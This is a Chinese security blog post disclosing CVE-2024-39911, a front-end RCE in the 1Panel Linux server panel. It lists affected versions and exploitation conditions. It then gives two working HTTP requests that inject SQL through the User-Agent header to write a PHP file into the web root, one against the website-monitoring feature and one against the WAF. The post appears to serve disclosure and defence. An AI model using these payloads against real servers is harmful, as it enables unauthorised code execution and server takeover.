Eswlnk Blog Eswlnk Blog
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈
  • 注册
  • 登录
首页 › 渗透分析 › 「漏洞资讯」1Panel面板前台RCE漏洞(CVE-2024-39911)

「漏洞资讯」1Panel面板前台RCE漏洞(CVE-2024-39911)

Eswlnk的头像
Eswlnk
2024-07-22 20:09:39
「漏洞资讯」1Panel面板前台RCE漏洞(CVE-2024-39911)-Eswlnk Blog
智能摘要 AI
1Panel是一款Linux服务器运维管理面板,近期发现其存在SQL注入漏洞,可能导致远程代码执行。影响版本包括专业版和社区版v1.10.10-lts,涉及网站监控和WAF功能。利用条件包括开启特定功能并关闭WAF,攻击者可通过SQL注入写入恶意文件,进而执行代码。漏洞详情已在GitHub和JunBlog平台披露。

1Panel是一款新一代的Linux服务器运维管理面板,用户可以通过Web图形界面轻松管理Linux服务器,实现主机监控、文件管理、数据库管理、容器管理等功能。它还深度集成了开源建站软件WordPress和Halo。

相关漏洞资讯来源:JunBlog

0x1 测试版本

专业版 v1.10.10-lts
社区版 v1.10.10-lts
1panel/openresty:1.21.4.3-3-1-focal

0x2 影响范围

  • 网站监控功能影响:1panel/openresty:1.21.4.3-3-1-focal
  • WAF功能影响:<= 1panel/openresty:1.21.4.3-3-1-focal

0x3 网站监控功能GetShell

利用条件

  • 专业版,并开启网站监控功能
  • 关闭WAF功能
  • 安装有1P-openresty容器且搭建有PHP环境网站

网站默认路径格式如下,这个路径是在op容器里面的路径:

/www/sites/网站代号(默认为域名)/index/

通过SQL注入导出文件到网站路径下:

GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#

然后我们可以在网站路径下看到写入的文件:

「漏洞资讯」1Panel面板前台RCE漏洞(CVE-2024-39911)-Eswlnk Blog

访问后发现成功输出 blog.mo60.cn 的md5值,成功执行代码:

「漏洞资讯」1Panel面板前台RCE漏洞(CVE-2024-39911)-Eswlnk Blog

0x4 Waf功能

利用条件

  • 开启WAF功能
  • 安装有1P-openresty容器且搭建有PHP环境网站

发送后即可成功写入文件:

GET /.git/config HTTP/1.1
Host: 192.168.99.6
User-Agent: blog.mo60.cn',"args", "sqlInjectA", "", "YmxvZy5tbzYwLmNu", "blog.mo60.cn", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#
Connection: close

漏洞来源

  • GitHub Advisory
  • 相关资料

本站默认网盘访问密码:1166
本站默认网盘访问密码:1166
1panel安全攻防对抗漏洞
0
0
Eswlnk的头像
Eswlnk
一个有点倒霉的研究牲站长
赞赏
「高危漏洞」xz 和 liblzma 5.6.0~5.6.1 被植入后门,威胁所有 x64 架构 Linux 和 macOS 用户
上一篇
「漏洞资讯」多用户管理系统API接口调用存在前台SQL注入漏洞(0day)
下一篇

评论 (0)

请登录以参与评论
现在登录
    发表评论

猜你喜欢

  • 「漏洞资讯」CVE-2025-12914:宝塔面板曝出注入漏洞
  • 今日热点:伪Clash软件下载陷阱曝光,附防范建议
  • 漏洞资讯:Ollama 未授权访问漏洞分析与防护指南
  • 「攻防对抗」利用 fastjson 原生反序列化与动态代理突破安全限制
  • 「攻防对抗」从上传漏洞到Getshell | 一次完整的渗透过程
Eswlnk的头像

Eswlnk

一个有点倒霉的研究牲站长
1108
文章
319
评论
679
获赞

随便看看

对某漫画APP进行的一次渗透测试
2023-02-01 14:47:42
360白文件识别以及白名单
2023-07-07 17:53:04
[CVE-2022-34918]Linux 防火墙漏洞复现
2022-07-22 1:24:52

专题展示

WordPress53

工程实践37

热门标签

360 AI API CDN java linux Nginx PDF PHP python SEO Windows WordPress 云服务器 云服务器知识 代码 免费 安全 安卓 工具 开发日志 微信 微软 手机 插件 攻防 攻防对抗 教程 日志 渗透分析 源码 漏洞 电脑 破解 系统 编程 网站优化 网络 网络安全 脚本 苹果 谷歌 软件 运维 逆向
  • 首页
  • 知识库
  • 地图
Copyright © 2023-2025 Eswlnk Blog. Designed by XiaoWu.
本站CDN由 壹盾安全 提供高防CDN安全防护服务
蜀ICP备20002650号-10
页面生成用时 0.407 秒   |  SQL查询 33 次
本站勉强运行:
友情链接: Eswlnk Blog 网站渗透 倦意博客 特资啦!个人资源分享站 祭夜博客 iBAAO壹宝头条
  • WordPress142
  • 网络安全64
  • 漏洞52
  • 软件52
  • 安全48
现在登录
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈